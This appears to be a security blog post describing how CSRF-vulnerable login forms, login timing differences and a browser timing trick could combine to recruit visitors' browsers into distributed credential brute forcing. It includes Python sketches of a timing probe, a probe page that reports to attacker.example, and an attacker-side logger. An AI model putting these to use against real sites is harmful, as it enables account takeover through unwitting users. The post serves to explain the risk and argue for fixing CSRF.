
Performing Distributed Brute Forcing of CSRF vulnerable login pages

Update:
Apparently this is described in a paper by SensePost that I wasn't aware of. Check out their paper at http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pdf.

We know that CSRF is bad, and that if your application performs an important action it should require a random token tied to the user's session. I started thinking a bit about CSRF, timing attacks, and Jeremiah Grossman's intranet scanning research, and landed on 'CSRF'able login forms + timing attacks + intranet scanning methods = possibly pretty bad?'.

Timing attacks
The SensePost guys gave a good talk at Black Hat Vegas this year on how they identified many websites whose response times differ depending on whether the login (or even just the username) is valid or invalid. For example, logging in with a valid user may take 200 milliseconds to receive a response, whereas an invalid login may take on average 315 milliseconds before receiving a response.
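
As a quick aside, whether such a timing difference exists at all is something you could measure yourself before involving anyone else's browser. A minimal sketch, assuming a hypothetical GET-based login form with made-up parameter names:

import time
import urllib.parse
import urllib.request

LOGIN_URL = "http://target.example/login"  # hypothetical GET login form

def time_login(username, password):
    """Return the response time of one login attempt in milliseconds."""
    query = urllib.parse.urlencode({"user": username, "pass": password})
    start = time.monotonic()
    urllib.request.urlopen(LOGIN_URL + "?" + query).read()
    return (time.monotonic() - start) * 1000

def average_ms(username, password, samples=10):
    return sum(time_login(username, password) for _ in range(samples)) / samples

# A consistent gap (e.g. ~200ms vs ~315ms) suggests the form leaks timing info.
print("known-invalid:", average_ms("nosuchuser", "wrongpass"))
print("guess:", average_ms("admin", "password1"))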

Intranet portscanning tricks
Jeremiah outlined the following in his post

"Here's how its supposed to work... there are the two important lines of HTML:

The HTML is hosted on an "attacker" controlled website.
<link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />
<img src="http://attacker/check_time.pl?ip=192.168.1.100&start=epoch_timer" />

The LINK tag has the unique behavior of causing the browser (Firefox) to stop parsing the rest of the web page until its HTTP request (for 192.168.1.100) has finished. The purpose of the IMG tag is as a timer and data transport mechanism back to the attacker. Once the web page is loaded, at some point in the future a request is received by check_time.pl. By comparing the current epoch to the initial "epoch_timer" value (when the web page was dynamically generated) it's possible to tell if the host is up. If the time difference is less than say 5 seconds then likely the host is up, if more, then the host is probably down (browser waited for timeout).

Example (attacker web server logs)

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762279
(3 second delay) - Host is up

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762286
(10 second delay) - Host is down

" - Jeremiah 'I wish I was #1 on google when you typed in "Jeremiah"' Grossman

In Jeremiah's example the difference between hosts was a matter of seconds, because an offline host forces the browser to wait for its default timeout. His trick relied on the fact that browsers (this may depend on the browser) load resources in order from top to bottom. With that behavior and his trick of calling an external resource, one may be able to send requests to a login form via a link/image tag (or equivalent) and measure the response times in a similar fashion using a logging script. Spread this across a few hundred websites and you have an army of 'visitors' at your command.
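
To make that concrete, the page served to each 'visitor' might look something like the sketch below. This is my own illustration: the hostnames, paths, and form field names are placeholders, and a real target form would obviously need its actual parameter names.

import time

def build_probe_page(login_url, username, password, logger_url):
    # The LINK tag blocks parsing (in Firefox) until the login GET completes;
    # the IMG tag then reports back, carrying the page-generation timestamp.
    guess = f"{login_url}?user={username}&pass={password}"
    timer = f"{logger_url}?user={username}&start={int(time.time() * 1000)}"
    return (
        "<html><body>\n"
        f'<link rel="stylesheet" type="text/css" href="{guess}" />\n'
        f'<img src="{timer}" />\n'
        "</body></html>"
    )

print(build_probe_page("http://victim.example/login", "admin", "password1",
                       "http://attacker.example/log_timing"))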

* If I were to find a login form that is CSRF'able, I may be able to identify a timing difference between a valid and an invalid login. This would be in milliseconds and would vary from site to site.
* I could utilize the timing tricks outlined by Jeremiah to record the initial request time and the response time (see the logger sketch after this list).
* I may be able to identify a valid set of credentials this way, or even just valid usernames.
* If I were to distribute code to do this over a few million page loads of random websites, I could direct tens or hundreds of thousands of people to each perform 1-2 credential brute force requests before a captcha is fired.
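
A rough sketch of the attacker-side logger that would receive those IMG requests is below. The threshold, port, and parameter names are assumptions for illustration only; as noted in the considerations that follow, the threshold would really need per-site and per-visitor calibration.

import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

VALID_THRESHOLD_MS = 250  # made-up value; would need calibration per site/visitor

class TimingLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        # The delta includes the visitor's network latency and page-render time,
        # which is exactly the noise the considerations below talk about.
        params = parse_qs(urlparse(self.path).query)
        delta_ms = int(time.time() * 1000) - int(params["start"][0])
        verdict = "possibly valid" if delta_ms < VALID_THRESHOLD_MS else "likely invalid"
        print(f"user={params.get('user', ['?'])[0]} delta={delta_ms}ms -> {verdict}")
        self.send_response(200)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), TimingLogger).serve_forever()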

Considerations

* The login form must support GET (POST *may* be possible)
* Each user would have different latency to the site in question, as well as to the site hosting the timer script
* You may need to log the user out before sending the login request, which is pretty noticeable to the user
* Test requests would be required on a per-user basis to establish reasonable timing thresholds for valid versus invalid requests. Depending on the level of sophistication, this may be pretty easy to detect.
* A large percentage of the users performing these requests may have totally random response times, or times that fall outside a reasonable threshold
* Not all CSRF'able login forms would be vulnerable, or vulnerable enough to notice a timing delay

No, I don't plan on making a PoC for this, as I don't see a PoC bringing value. Yet another reason to fix CSRF issues, and yet another use case.
